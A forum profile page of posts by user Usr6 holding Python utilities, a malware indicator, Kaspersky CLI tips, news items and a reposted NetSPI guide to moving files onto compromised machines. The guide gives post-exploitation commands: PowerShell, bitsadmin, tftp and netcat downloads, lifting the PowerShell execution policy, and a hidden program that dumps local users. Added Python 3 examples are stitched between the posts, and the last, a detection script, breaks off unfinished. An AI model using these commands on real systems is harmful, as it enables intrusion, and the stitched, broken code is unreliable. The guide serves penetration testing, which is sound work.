Everything posted by Usr6

  1. Can be included at the start of any Python script that uses modules which are not installed by default. It uses pip to install the missing modules. Currently available only for the Windows operating system & Python 2.7.

          import sys
          import os

          #######################################
          # RST Self installing missing modules #
          # Usr6                                #
          #######################################

          # because sometimes the module name differs from the package name:
          librarie = {"modul":"nume pachet", "bs4":"beautifulsoup4"}

          def install_module(e):
              # the ImportError text ends with the name of the missing module
              module = str(e).split()[-1]
              # fall back to the module name when it has no entry in the mapping
              pachet = librarie.get(module, module)
              raw_input("Lipseste modulul %s, apasa Enter pentru a incerca instalarea lui automata..." %module)
              if os.name == "nt":
                  if not os.path.isfile('C:\\Python27\\Scripts\\pip.exe'):
                      sys.exit("N-ai pip, n-ai noroc. Il gasesti aici: https://pypi.python.org/pypi/pip")
                  os.system ('C:\\Python27\\Scripts\\pip.exe install "%s"' %(pachet))
                  # restarting script
                  os.system('echo restarting... && %s "%s"' %(sys.executable, sys.argv[0]))
                  sys.exit()
              elif os.name == "posix":
                  sys.exit('%s ..."inca" NU, trebuie sa instalezi manual pachetul %s \ngoogle is your friend' %(os.name, pachet))
              else:
                  sys.exit('%s ..."inca" NU, trebuie sa instalezi manual pachetul %s \ngoogle is your friend' %(os.name, pachet))

          try:
              # import external modules
              from bs4 import BeautifulSoup
          except Exception as d41d8cd98f00b204e9800998ecf8427e:
              install_module(d41d8cd98f00b204e9800998ecf8427e)

          # your script start here
          print """ ### ### ### # # # # ### ### # ## # # # # ### #forums"""
          raw_input("Press Enter/Return to exit...")
          sys.exit()
  2. bebegbg.no-ip.org 2606
     HKCU\Software\Microsoft\Windows\CurrentVersion\Run taskmgr Windows Command Processor Microsoft Corporation C:\documents and settings\Usr7\local settings\temp\taskmgr\taskmgr.exe
     it was 2/54 https://www.virustotal.com/en/file/38c73d346f9da12a69c54c3665c3ef4172fc14eaa01b54a1904b1cae0124cbbb/analysis/1403683358/
  3.
          #!/usr/bin/env python
          import sys
          import os
          import random
          import argparse

          print """
          #################################
          # Rst Almost secure file eraser #
          # Usr6                          #
          #################################"""

          parser = argparse.ArgumentParser(description="RST Almost secure file eraser")
          parser.add_argument("input", metavar="path/file", help="sterge fisierul")
          parser.add_argument("-m", "--maxstr", metavar="nr", default = 3000000, help="cati octeti vor fi scrisi la fiecare trecere")
          args = parser.parse_args()

          def aleator(l):
              # progress marker, then l random alphanumeric characters
              print random.choice("~*&^%$#@!"),
              variabila = ''
              for i in range(l):
                  variabila += random.choice('ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz1234567890')
              return variabila

          def writefile(fisier, drepturi, nr):
              # the with block closes the file on exit
              with open(fisier, drepturi) as handle:
                  handle.write(aleator(nr))

          size = os.path.getsize(args.input)
          print args.input, size, args.maxstr
          ask = raw_input("Esti sigur ca vrei sa-l stergi definitiv?(y/n): ")
          if ask != "Yes" and ask != "YES" and ask != "yes" and ask != "Y" and ask != "y":
              sys.exit("Nu am sters nimic")

          # "wb" truncates the file, then the original number of bytes is written back
          if size <= int(args.maxstr):
              writefile(args.input, "wb", size)
          else:
              writefile(args.input, "wb", int(args.maxstr))
              size -= int(args.maxstr)
              while size !=0:
                  if size <= int(args.maxstr):
                      writefile(args.input, "ab", size)
                      break
                  else:
                      writefile(args.input, "ab", int(args.maxstr))
                      size -= int(args.maxstr)

          if not os.remove(args.input):
              print "\n%s deleted" %(args.input)
          sys.exit(raw_input("press enter..."))

     usage: file_eraser.py filename
     help: file_eraser.py -h
     adding it to the context menu (right click): regedit
          HKEY_CLASSES_ROOT/*/shell
              New key: Eraser
              (Default) REG_SZ Eraser...
          HKEY_CLASSES_ROOT/*/shell/Eraser
              New key: command
              (Default) REG_SZ python C:\\Python27\\file_eraser.py "%1"
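An in-place variant of the overwrite-then-delete idea in the eraser post above, as an added Python 3 example (not Usr6's script). It opens the file without truncating it, writes `os.urandom` data over the existing bytes, and syncs before unlinking; the function names and chunk size are assumptions, and on SSDs, journaling or copy-on-write file systems the old blocks can still survive.

```python
import os
import tempfile

CHUNK = 1024 * 1024  # assumed write size per call; not a value from the post


def overwrite_in_place(path, passes=1, chunk=CHUNK):
    """Overwrite every byte of `path` with random data; return the file size."""
    size = os.path.getsize(path)
    # "r+b" keeps the file's current length and writes over it from offset 0.
    # Opening with "wb" would truncate to zero first, and the file system is
    # then free to place the new data in different blocks.
    with open(path, "r+b") as handle:
        for _ in range(passes):
            handle.seek(0)
            remaining = size
            while remaining > 0:
                n = min(chunk, remaining)
                handle.write(os.urandom(n))  # OS CSPRNG, not the `random` module
                remaining -= n
            handle.flush()
            os.fsync(handle.fileno())  # push this pass to the device
    return size


def erase(path, passes=1):
    """Overwrite then unlink a regular file; refuse names that alias other data."""
    if os.path.islink(path) or not os.path.isfile(path):
        raise ValueError("not a regular file: %r" % path)
    if os.stat(path).st_nlink > 1:
        raise ValueError("file has other hard links: %r" % path)
    written = overwrite_in_place(path, passes)
    os.remove(path)
    return written


def demo():
    """Run against a constructed temporary file and report what changed."""
    fd, path = tempfile.mkstemp()
    secret = b"constructed secret line\n" * 500
    with os.fdopen(fd, "wb") as handle:
        handle.write(secret)
    overwrite_in_place(path, chunk=4096)
    with open(path, "rb") as handle:
        after = handle.read()
    same_length = len(after) == len(secret)
    still_readable = b"constructed secret" in after
    written = erase(path)
    return same_length, still_readable, written, os.path.exists(path)


if __name__ == "__main__":
    print(demo())
```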
  4. 1. Download Latest Versions | Virus Removal Tool | Kaspersky Lab Version 11 (11.0.0.1245)
     2. Run "setup_11.0.1.1245.x01_2014_06_19_11_26.exe" and let it unpack itself, run its updates, etc. until "I accept ..." appears
     3. Create a new directory "Kaspersky" in C:\
     4. In Local Settings\Temp\ there are 2 directories of interest: "RarSFX0" and one named with many digits, in my case "2874282"
        From "RarSFX0" move the Drivers directory to C:\Kaspersky\
        From the digits directory copy the entire contents to C:\Kaspersky
     5. In C:\Kaspersky, one of the executables has a name of the form 3594572.exe
        - to scan a file from the CLI: 3594572.exe scan fisier.exe

     Adding the scan option to the (right-click) menu of any file:
     UPDATE: in order to correctly scan files whose names contain spaces, in the picture below it is: C:\Kaspersky\3594572.exe scan "%1"
     step by step: How to Add Any Application Shortcut to Windows Explorer’s Context Menu
     All File Types
     menu for drive scan: How to Add or Remove Entries from Context Menus in Windows? - AskVG

     Final result: right-click on the suspicious file > Kaspersky scan
     *it updates its signatures before scanning the file
     //LE @bcman, if you rename the file, it no longer works
     p.s. when scanning, if the text appears and disappears quickly, it means the file is clean. If it is infected, the delete option appears, as in the picture above.
  5. HP has unveiled its revolutionary supercomputer, The Machine. The all-in-one device – a server, workstation, PC and phone – uses photonic memory and is portable, potentially opening doors to a more powerful, energy-efficient global computer industry. The Machine will be able to handle vast quantities of data using far less electricity, HP claims, adding that its system will be six times more powerful than existing servers and require 80 times less energy. According to HP, today the IT industry uses as much energy as is used by all of Japan to run the immense volumes of data stored in public clouds alone, so this technology will save the energy produced by several nuclear power plants worldwide. However exciting, the project is still under development and the company isn’t expecting to produce its first prototypes until 2015. The first devices equipped with The Machine are not scheduled to be released until 2018.

     The new data transfer system will be based on silicon photonics to transmit data, as an alternative to copper wires, using lasers that are just 1/4 the diameter of a human hair. HP promises it will boost the speed of the system whilst reducing energy requirements. To operate The Machine, the company has invented a new type of memory called “memristors,” which are fast, allow permanent storage even if the power is cut off and are designed to replace current storage devices. HP claims The Machine is capable of managing 160 petabytes in 250 nanoseconds. The device’s main difference is that it will be operating clusters of specialized cores while today’s computers operate much smaller numbers of generalized cores. This is seen as the key for the Internet of Things future network, which will bundle together all digitalized knowledge and make it accessible and usable by devices such as The Machine.

     HP’s chief technology officer, Martin Fink, said The Machine’s technology could already be scaled down to be used in smartphones, which could eventually lead to making handheld devices with 100 terabytes of memory. When released, the Machine is expected to replace a data center’s worth of equipment with a single refrigerator-size device. Naturally, The Machine won’t be able to use any of the existing operational systems, so it will require HP to develop a new OS capable of operating mass data volumes in no time.

     Although it was only recently unveiled at Hewlett-Packard's Discover customer event in Las Vegas, the development has already been criticized by Dell, another US computer technology company, who called the attempt "laughable." “The notion that you can reach some magical state by rearchitecting an OS is laughable on the face of it,” John Swainson, president of software at Dell, told journalists in San Francisco, adding that "the basic elements of computing, like processor and memory, are likely to be reconfigured in some way, but not so radically that existing software won’t run."

     HP is much more optimistic, placing high hopes in The Machine. Saying it will not be just for huge supercomputers, the company promises its new technology could be used in smaller devices such as smartphones and laptops. It already sees a variety of future applications, from business to medicine, for The Machine. “Your doctor could compare your symptoms and genomics with every other patient around the world to improve your health outcomes, instantly, without language barriers or privacy breaches,” HP says. The company said its device will also address data governance and security issues in an effort to better protect information.

     Source: Supercomputer revolution: Meet HP’s The Machine – an all-in-one, mega-powerful photonic device — RT News
  6. indeed, script updated

          #!/usr/bin/env python
          import os
          import sys
          import hashlib

          print """
          #############################
          # Rst Duplicate file finder #
          # Usr6                      #
          #############################
          #nytro edition*
          #*are la baza fallen edition
          """

          biblioteca = {}   # file size -> list of paths
          librarie = {}     # md5 -> list of paths

          def hashfile(afile):
              #####
              #http://www.pythoncentral.io/hashing-files-with-python/
              #####
              BLOCKSIZE = 65536
              hasher = hashlib.md5()
              with open(afile, "rb") as afile:
                  buf = afile.read(BLOCKSIZE)
                  while len(buf) > 0:
                      hasher.update(buf)
                      buf = afile.read(BLOCKSIZE)
              return hasher.hexdigest()

          def fileparsing(root):
              # first pass: group every file under root by its size
              for root, subFolders, files in os.walk(root):
                  for file in files:
                      fullpath = os.path.join(root, file)
                      try:
                          file_size = str(os.path.getsize(fullpath))
                          if file_size not in biblioteca.keys():
                              biblioteca[file_size] = [fullpath]
                          else:
                              listapath = biblioteca[file_size] +[fullpath]
                              biblioteca[file_size] = listapath
                          print fullpath
                      except Exception as bug:
                          with open("bugs.txt", "a") as handle:
                              handle.write(str(bug) + "\n")

          root = raw_input("Enter start dir: ")
          if os.path.isdir(root):
              fileparsing(root)
          else:
              while not os.path.isdir(root) and root != "exit":
                  print "Mai incearca o data sau 'exit' + enter to Exit"
                  root = raw_input("Enter start dir: ")
              if root != "exit":
                  fileparsing(root)
              else:
                  sys.exit("Out!")

          print "Filtram rezultatele:"
          # second pass: hash only the files that share their size with another file
          for f_size in biblioteca.keys():
              if len(biblioteca[f_size]) >1:
                  for f_path in biblioteca[f_size]:
                      try:
                          md5hash = hashfile(f_path)
                          if md5hash not in librarie.keys():
                              librarie[md5hash] = [f_path]
                          else:
                              listapath = librarie[md5hash] +[f_path]
                              librarie[md5hash] = listapath
                          print f_path
                      except Exception as bug:
                          with open("bugs.txt", "a") as handle:
                              handle.write(str(bug) + "\n")

          print "Scriu rezultatele finale in fisierul 'duplicate.txt'"
          for md5_ in librarie.keys():
              if len(librarie[md5_]) >1:
                  with open("duplicate.txt", "a") as handle:
                      handle.write(str(md5_) + "\n")
                      for f_path in librarie[md5_]:
                          handle.write("\t\t" + str(os.path.getsize(f_path))+ "\t"+ str(f_path) +"\n")

          print "\nRezultate:"
          print "Buguri:", "bugs.txt" if os.path.isfile("bugs.txt") else "N-am gasit"
          print "Duplicate: ", "duplicate.txt" if os.path.isfile("duplicate.txt") else "N-am gasit"
          sys.exit("Out!")
  7. If you really insist...

          #!/usr/bin/env python
          import os
          import sys
          import hashlib

          print """
          #############################
          # Rst Duplicate file finder #
          # Usr6                      #
          #############################
          #fallen edition
          """

          biblioteca = {}   # md5 -> list of paths

          def hashfile(afile):
              #####
              #http://www.pythoncentral.io/hashing-files-with-python/
              #####
              BLOCKSIZE = 65536
              hasher = hashlib.md5()
              with open(afile, "rb") as afile:
                  buf = afile.read(BLOCKSIZE)
                  while len(buf) > 0:
                      hasher.update(buf)
                      buf = afile.read(BLOCKSIZE)
              return hasher.hexdigest()

          def fileparsing(root):
              # hash every file under root and group the paths by digest
              for root, subFolders, files in os.walk(root):
                  for file in files:
                      fullpath = os.path.join(root, file)
                      try:
                          md5hash = hashfile(fullpath)
                          if md5hash not in biblioteca.keys():
                              biblioteca[md5hash] = [fullpath]
                          else:
                              listapath = biblioteca[md5hash] +[fullpath]
                              biblioteca[md5hash] = listapath
                          print fullpath
                      except Exception as bug:
                          with open("bugs.txt", "a") as handle:
                              handle.write(str(bug) + "\n")

          root = raw_input("Enter start dir: ")
          if os.path.isdir(root):
              fileparsing(root)
          else:
              while not os.path.isdir(root) and root != "exit":
                  print "Mai incearca o data sau 'exit' + enter to Exit"
                  root = raw_input("Enter start dir: ")
              if root != "exit":
                  fileparsing(root)
              else:
                  sys.exit("Out!")

          for md5_ in biblioteca.keys():
              if len(biblioteca[md5_]) >1:
                  with open("duplicate.txt", "a") as handle:
                      handle.write(str(md5_) + "\n")
                      for f_path in biblioteca[md5_]:
                          handle.write("\t\t" + str(os.path.getsize(f_path))+ "\t"+ str(f_path) +"\n")

          print "\nRezultate:"
          print "Buguri:", "bugs.txt" if os.path.isfile("bugs.txt") else "N-am gasit"
          print "Duplicate: ", "duplicate.txt" if os.path.isfile("duplicate.txt") else "N-am gasit"
          sys.exit("Out!")
  8. As the title suggests, it searches for all the duplicate files on the computer + attached drives and writes them to the file duplicate.txt in the form:

          md5
                  file size1    file path
                  file size2    file path
          etc.

     Because md5 is no longer considered 100% secure, the results provided by this script cannot be 100% accurate either; @fallen_angel was lucky enough to run into a collision during testing.
     It should work without problems on any windows/*unix/+ubuntu system that has python 2.7 installed.

          #!/usr/bin/env python
          import os
          import sys
          import hashlib

          print """
          #############################
          # Rst Duplicate file finder #
          # Usr6                      #
          #############################
          """

          alfabet =["a","b","c","d","e","f","g","h","i","j","k","l","m",
                    "n","o","p","q","r","s","t","u","v","w","x","y","z"]
          biblioteca = {}   # md5 -> list of paths

          def hashfile(afile):
              #####
              #http://www.pythoncentral.io/hashing-files-with-python/
              #####
              BLOCKSIZE = 65536
              hasher = hashlib.md5()
              with open(afile, "rb") as afile:
                  buf = afile.read(BLOCKSIZE)
                  while len(buf) > 0:
                      hasher.update(buf)
                      buf = afile.read(BLOCKSIZE)
              return hasher.hexdigest()

          def fileparsing(root):
              # hash every file under root and group the paths by digest
              for root, subFolders, files in os.walk(root):
                  for file in files:
                      fullpath = os.path.join(root, file)
                      try:
                          md5hash = hashfile(fullpath)
                          if md5hash not in biblioteca.keys():
                              biblioteca[md5hash] = [fullpath]
                          else:
                              listapath = biblioteca[md5hash] +[fullpath]
                              biblioteca[md5hash] = listapath
                          print fullpath
                      except Exception as bug:
                          with open("bugs.txt", "a") as handle:
                              handle.write(str(bug) + "\n")

          #sys.platform
          # on Windows walk every drive letter that exists, elsewhere walk "/" once
          if os.name == "nt":
              for i in alfabet:
                  root = i + ":\\"
                  if os.path.isdir(root):
                      fileparsing(root)
          else:
              fileparsing("/")

          for md5_ in biblioteca.keys():
              if len(biblioteca[md5_]) >1:
                  with open("duplicate.txt", "a") as handle:
                      handle.write(str(md5_) + "\n")
                      for f_path in biblioteca[md5_]:
                          handle.write("\t\t" + str(os.path.getsize(f_path))+ "\t"+ str(f_path) +"\n")

          print "\nRezultate:"
          print "Buguri:", "bugs.txt" if os.path.isfile("bugs.txt") else "N-am gasit"
          print "Duplicate: ", "duplicate.txt" if os.path.isfile("duplicate.txt") else "N-am gasit"
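The accuracy caveat in the post above (equal MD5 digests do not prove equal files) can be removed by confirming every candidate group byte for byte. The following is an added Python 3 example, not one of Usr6's scripts: it groups by size, then by SHA-256, then splits each group with `filecmp.cmp(..., shallow=False)`; the `digest` parameter is an assumption introduced so a deliberately colliding hash can be plugged in to show the confirmation step working.

```python
import filecmp
import hashlib
import os
import tempfile
from collections import defaultdict


def sha256_file(path, blocksize=65536):
    """Stream a file through SHA-256 and return the hex digest."""
    hasher = hashlib.sha256()
    with open(path, "rb") as handle:
        for buf in iter(lambda: handle.read(blocksize), b""):
            hasher.update(buf)
    return hasher.hexdigest()


def find_duplicates(root, digest=sha256_file):
    """Return sorted lists of paths under `root` whose contents are identical."""
    # Pass 1: only files of equal size can be duplicates.
    by_size = defaultdict(list)
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            if os.path.islink(full) or not os.path.isfile(full):
                continue  # skip symlinks, sockets, devices
            try:
                by_size[os.path.getsize(full)].append(full)
            except OSError:
                continue  # unreadable entry

    groups = []
    for paths in by_size.values():
        if len(paths) < 2:
            continue
        # Pass 2: a digest narrows the candidates cheaply.
        by_digest = defaultdict(list)
        for path in paths:
            try:
                by_digest[digest(path)].append(path)
            except OSError:
                continue
        # Pass 3: the digest is only a hint; compare the actual bytes so a
        # hash collision can never be reported as a duplicate.
        for candidates in by_digest.values():
            classes = []
            for path in sorted(candidates):
                for cls in classes:
                    if filecmp.cmp(cls[0], path, shallow=False):
                        cls.append(path)
                        break
                else:
                    classes.append([path])
            groups.extend(cls for cls in classes if len(cls) > 1)
    return sorted(groups)


def demo():
    """Constructed sample: two equal files and one same-size file that differs."""
    samples = {"a.bin": b"same bytes", "b.bin": b"same bytes", "c.bin": b"diff bytes"}
    with tempfile.TemporaryDirectory() as root:
        for name, data in samples.items():
            with open(os.path.join(root, name), "wb") as handle:
                handle.write(data)
        strong = find_duplicates(root)
        # Worst case: a digest on which every file collides.
        colliding = find_duplicates(root, digest=lambda path: "always-equal")

    def names(found):
        return [[os.path.basename(p) for p in group] for group in found]

    return names(strong), names(colliding)


if __name__ == "__main__":
    print(demo())
```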
  9. A large-scale operation by police officers and prosecutors of DIICOT Timisoara, with the help of FBI agents, to catch several young men accused of computer fraud that led to the ‘cleaning out’ of hundreds of accounts belonging to Americans. The hits were planned from Romania, via Russia, Pakistan and the United States of America. Dozens of searches are taking place this morning at addresses in Timisoara, in Arad, and also in Mehedinti and Caras-Severin counties.

     Investigators speak of a network of cyber criminals who developed a spectacular method by which, over the course of 6 years, the data of thousands of bank cards was stolen. Practically, several young Romanians created a computer program with which they managed to steal information from at least 6,000 credit cards, then sold the data piece by piece in Russia, Pakistan and the USA, and with the money obtained they bought houses and luxury cars. This is one of the most important groups of cyber criminals in Romania.

     How did the network operate? According to investigators, the ring had been active since 2008. The Romanians in the group created a computer program that detected the vulnerabilities of several payment systems. They placed the program on the internet and discovered where the POS terminals were not well secured. Most of them turned out to be in restaurants, fast-food outlets and gas stations in America. Once the restaurants or fuel stations were identified, the operation moved to its second phase. Another program, of the keylogger type (a program that runs in the background, most of the time unnoticed by the system manager, and which records all the keystrokes that are made, with the information being put into a file), was introduced into the computers that coordinated the POS terminals, without the users suspecting anything. At the moment a card payment was made, this program unfailingly recorded the customer's account number and password.

     Over time, lists with the bank card data were compiled and reached the heads of the network in Romania, 5 young men, who then did NOT withdraw the money, but sold the information to individuals in the USA, Pakistan and Russia, who paid very well for it. They sent the Romanians the money through the Moneygram service, in installments, so that the sums would not attract attention. The foreigners who bought the information from Romania then took care of cloning the credit cards and withdrew various sums from the Americans' accounts. The money received for the data sold in Russia, Pakistan or the USA was ‘laundered’ by the Romanians, who bought houses, apartments or expensive cars.

     The ‘business’, however, came to the attention of FBI agents, who began investigating and have already questioned several people in America. The Federal Bureau of Investigation also requested information from 109 banks, which confirmed the withdrawals of money from people's accounts via Russia, Pakistan or the United States. The investigation was extended, so the FBI agents also asked the DIICOT Timisoara prosecutors for help in catching the members of the Romanian ring. 22 searches are taking place this morning: 2 in Timisoara, 6 in Arad, 13 in Mehedinti county and one in Caras Severin county.

     According to investigators, the heads of the Romanian network include Dinu Melcioiu, Robert Vargatu, Cristian Istodor and Andrei Velici. The young men will be investigated for computer crimes, money laundering and association for the purpose of committing crimes. All of them risk many years in prison.

     Source: » Ancheta FBI la Timisoara! Perchezitii DIICOT la tineri acuzati de lovituri informatice spectaculoase in SUA. Vezi o metoda stralucita prin care s-au furat date si s-au golit mii de carduri bancare! Opinia Timisoarei – Stiri din Timisoara cu
  10. Pentesters often upload files to compromised boxes to help with privilege escalation, or to maintain a presence on the machine. This blog will cover 15 different ways to move files from your machine to a compromised system. It should be interesting for penetration testers who have a presence on a box and need post-exploitation options, and system admins that just want to move files. There are many other ways to move files onto machines during pentests, but this list includes some of my favorites. Below is a summary of the file transfer techniques that will be covered in this blog.

          PowerShell file download
          Visual Basic file download
          Perl file download
          Python file download
          Ruby file download
          PHP file download or upload
          FTP file download
          TFTP file download
          Bitsadmin file download
          Wget file download
          Netcat file download
          Windows share file download
          Notepad dialog box file download
          Exe to Text, Text to EXE with PowerShell and Nishang
          Csc.exe to compile from source file

      Note: Many of the techniques listed should also be considered as options when executing commands through SQL injection. For the multi-line steps, ECHO the commands to a file, and then execute the file.

      PowerShell File Download

      PowerShell is one of those scripting languages that can be overlooked as a threat by administrators. However, it can provide a plethora of options and capabilities to someone who knows how to use it. The biggest benefit is that it is native to Windows since Windows Server 2003. Below is an example of a simple script that can be used to download a file to the local file system from a webserver on the internet:

          $p = New-Object System.Net.WebClient
          $p.DownloadFile("http://domain/file", "C:\%homepath%\file")

      To execute this script, run the following command in a PowerShell window:

          PS C:\> .\test.ps1

      Sometimes, the PowerShell execution policy is set to restricted. In this case, you will not be able to execute commands or scripts through PowerShell… unless you just set it to unrestricted using the following command:

          C:\>powershell set-executionpolicy unrestricted

      Visual Basic File Download

      The final version of Visual Basic has come standard on Windows machines since 1998. The following script can download a file of your choosing. However, the script is quite a bit larger than the PowerShell one.

          Set args = Wscript.Arguments
          Url = "http://domain/file"
          dim xHttp: Set xHttp = createobject("Microsoft.XMLHTTP")
          dim bStrm: Set bStrm = createobject("Adodb.Stream")
          xHttp.Open "GET", Url, False
          xHttp.Send
          with bStrm
              .type = 1 ' binary stream
              .open
              .write xHttp.responseBody
              .savetofile "C:\%homepath%\file", 2 ' overwrite an existing file
          end with

      Cscript is a command line Windows Script Host that allows you to pass command line options and allows you to set script properties. It is not necessary to use this to run a vbs script in Windows 7 and possibly others, but using it allows your scripts to run on Windows XP machines and above. To execute this script, run the following command in a command shell:

          C:\>cscript test.vbs

      The following four languages are non-native to Windows machines. However, if you find a machine with any of these languages installed on them (regardless of the OS), you can leverage these scripts to download files.

      Perl File Download

      Perl is an extremely versatile scripting language that can be used for almost anything. Using Perl makes it super easy to download files onto the local host.

          #!/usr/bin/perl
          use LWP::Simple;
          getstore("http://domain/file", "file");

      To execute this script, run the following command in a command shell:

          root@kali:~# perl test.pl

      Python File Download

      Python is a general purpose scripting language that emphasizes code readability. As with most scripting languages, the goal is to write less code than needed for a programming language, while still accomplishing the intended task.

          #!/usr/bin/python
          import urllib2
          u = urllib2.urlopen('http://domain/file')
          # binary mode so the bytes are written unchanged on every platform
          localFile = open('local_file', 'wb')
          localFile.write(u.read())
          localFile.close()

      To execute this script, run the following command in a command shell:

          root@kali:~# python test.py

      Ruby File Download

      Ruby is an object-oriented programming language that can be used for many things from creating frameworks (think Metasploit) to simple tasks such as downloading files.

          #!/usr/bin/ruby
          require 'net/http'
          Net::HTTP.start("www.domain.com") { |http|
            r = http.get("/file")
            open("save_location", "wb") { |file|
              file.write(r.body)
            }
          }

      To execute this script, run the following command in a command shell:

          root@kali:~# ruby test.rb

      PHP File Download

      PHP is usually a server-side scripting language used for web development, but can also be used as a general purpose scripting language.

          #!/usr/bin/php
          <?php
          // read the whole response body, not only its first line
          $data = @file_get_contents("http://example.com/file");
          $lf = "local_file";
          $fh = fopen($lf, 'w');
          fwrite($fh, $data);
          fclose($fh);
          ?>

      To execute this script, run the following command in a command shell:

          root@kali:~# php test.php

      The remaining ways to move files onto a target machine are through native operating system functions unless otherwise noted. Some of these require more steps than others, but can be used in different scenarios to bypass certain restrictions.

      FTP File Download

      For this method, an attacker would want to echo the FTP commands to a bash script since it generally requires user interaction to input a username and password. This bash script can then be run to have all the steps run without the need for interaction.

          ftp 127.0.0.1
          username
          password
          get file
          exit

      TFTP File Download

      Trivial FTP comes by default in Windows Vista and below. Note that you will have to set up the corresponding server to connect to. It can be run using the following command:

          tftp -i host GET C:\%homepath%\file location_of_file_on_tftp_server

      Bitsadmin File Download

      Bitsadmin is a command-line tool for Windows that allows a user to create download or upload tasks.

          bitsadmin /transfer n http://domain/file c:\%homepath%\file

      Wget File Download

      Wget is a Linux and Windows tool that allows for non-interactive downloads.

          wget http://example.com/file

      Netcat File Download

      Netcat can allow for downloading files by connecting to a specific listening port that will pass the contents of a file over the connection. Note that this example is Linux specific. On the attacker's computer, type:

          cat file | nc -l 1234

      This will print the contents of the file to the local port 1234. Then, whenever someone connects to that port, the contents of the file will be sent to the connecting IP. The following command should be run on the machine the attacker is targeting:

          nc host_ip 1234 > file

      This will connect the target to the attacker's computer and receive the file that will be sent over the connection.

      Windows Share File Download

      Windows shares can be mounted to a drive letter, and files can then be copied over by subsequent copy commands. To mount a remote drive, type:

          net use x: \\127.0.0.1\share /user:example.com\userID myPassword

      Notepad Dialog Box File Download

      If you have access (RDP, physical, etc.) to a machine, but your user permissions do not allow you to open a web browser, this is a trick you can use to quickly download a file from a URL or a Universal Naming Convention (UNC) path. This also works well when you are breaking out of a locked-down application being run on a terminal.

          1. Open notepad
          2. Go to file - open
          3. In the File Name box near the bottom, type in the full URL path to your file

      Notepad is kind enough to go out and grab the contents of this file for you.

      Exe to Txt, and Txt to Exe with PowerShell and Nishang

      This is possibly one of my favorite tools to use when trying to move an exe to a machine. Nishang allows you to convert an exe to hex, then reassemble the hex into the original exe using PowerShell. I have seen group policies that do not allow for the transfer of exes through the RDP clipboard. Although it provides basic protection, it (sometimes) still allows the ability to copy text through the clipboard. In this scenario, you would be able to copy across the Nishang PowerShell source to a file on the box and rename the extension to .ps1. The Nishang script you want to copy is TexttoExe.ps1, and it is only 8 lines long. You can download Nishang here. To convert the exe to a hex file, type:

          PS > .\ExetoText.ps1 evil.exe evil.txt

      Open the evil.txt file and copy the contents. Then paste the contents to the target machine using the RDP clipboard. Do the same with the contents of the TexttoExe.ps1 file in Nishang. To convert the hex file back to an exe, type:

          PS > .\TexttoExe.ps1 evil.txt evil.exe

      This will result in your evil exe being successfully moved to the target machine.

      Csc.exe to Compile Source from a File

      C sharp compiler (csc) is the command line compiler included with Microsoft .NET installations within Windows. This could be useful if you are unable to copy over an executable file, but can still copy over text. Using this method, combined with SQL injection, can move an exe to a box without having to try to bypass egress filters or authenticated proxies that might block outbound connectivity. The default location for this executable is the following:

          C:\Windows\Microsoft.NET\Framework\version

      Using the following example code, the compiled executable will use cmd.exe to query the local users on the box and write the results to a file in the C:\Temp directory. This could obviously be modified to interact with different exe's on the box, or completely re-written to use your own exploit code.

          public class Evil
          {
              public static void Main()
              {
                  System.Diagnostics.Process process = new System.Diagnostics.Process();
                  System.Diagnostics.ProcessStartInfo startInfo = new System.Diagnostics.ProcessStartInfo();
                  startInfo.WindowStyle = System.Diagnostics.ProcessWindowStyle.Hidden;
                  startInfo.FileName = "cmd.exe";
                  startInfo.Arguments = "/C net users > C:\\Temp\\users.txt";
                  process.StartInfo = startInfo;
                  process.Start();
              }
          }

      To compile your source code, type:

          csc.exe /out:C:\evil\evil.exe C:\evil\evil.cs

      Wrap up

      Hopefully this blog has given you viable options for getting your files (malicious or otherwise) over to a server.

      Source: https://www.netspi.com/blog/entryid/231/15-ways-to-download-a-file
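For defenders, the Windows command lines quoted in the post above are distinctive enough to match in process-creation logs. The following is an added Python example (not from the NetSPI post): the rule names, the tab-separated log layout, the hosts and the sample events are constructed, and the patterns only cover the literal command forms shown on this page.

```python
import re
from collections import Counter

# One pattern per command form quoted in the post (case-insensitive).
RULES = [
    ("powershell_webclient_download",
     re.compile(r"System\.Net\.WebClient|\.DownloadFile\(", re.I)),
    ("powershell_policy_unrestricted",
     re.compile(r"set-executionpolicy\s+unrestricted", re.I)),
    ("bitsadmin_transfer",
     re.compile(r"\bbitsadmin(?:\.exe)?\s+/transfer\b", re.I)),
    ("tftp_get",
     re.compile(r"\btftp(?:\.exe)?\s+-i\s+\S+\s+get\b", re.I)),
    ("net_use_with_password",
     re.compile(r"\bnet\s+use\s+\w:\s+\\\\\S+\s+/user:\S+\s+\S+", re.I)),
    ("csc_compile_to_exe",
     re.compile(r"\bcsc(?:\.exe)?\s+/out:\S+\.exe\b", re.I)),
]

# Constructed sample events: (timestamp, host, user, command line).
SAMPLE_EVENTS = [
    ("2014-06-25T10:01:12", "WS01", "alice", r"notepad.exe C:\Users\alice\notes.txt"),
    ("2014-06-25T10:02:40", "WS01", "alice",
     r"powershell -Command (New-Object System.Net.WebClient)"
     r".DownloadFile('http://example.test/file','C:\Temp\file')"),
    ("2014-06-25T10:03:05", "WS01", "alice", r"powershell set-executionpolicy unrestricted"),
    ("2014-06-25T10:04:19", "WS01", "alice",
     r"bitsadmin /transfer n http://example.test/file c:\Temp\file"),
    ("2014-06-25T11:15:00", "SRV02", "svc_web", r"net use"),
    ("2014-06-25T11:15:31", "SRV02", "svc_web",
     r"net use x: \\192.0.2.10\share /user:example.com\userID myPassword"),
    ("2014-06-25T11:16:02", "SRV02", "svc_web", r"csc.exe /out:C:\Temp\tool.exe C:\Temp\tool.cs"),
    ("2014-06-25T11:17:48", "SRV02", "svc_web", r"tftp -i 192.0.2.10 GET file C:\Temp\file"),
    ("2014-06-25T11:18:10", "SRV02", "svc_web", r"ping 192.0.2.10"),
]
SAMPLE_LOG = ["\t".join(event) for event in SAMPLE_EVENTS] + ["malformed line without fields"]


def parse_line(line):
    """Split one tab-separated log line; return None when it is malformed."""
    parts = line.rstrip("\n").split("\t", 3)
    if len(parts) != 4:
        return None
    return dict(zip(("time", "host", "user", "cmdline"), parts))


def scan(lines):
    """Return (line number, host, rule name) for every rule a line matches."""
    hits = []
    for lineno, line in enumerate(lines, start=1):
        event = parse_line(line)
        if event is None:
            continue
        for name, pattern in RULES:
            if pattern.search(event["cmdline"]):
                hits.append((lineno, event["host"], name))
    return hits


def hits_per_host(hits):
    """Count matches per host so a burst on one machine stands out."""
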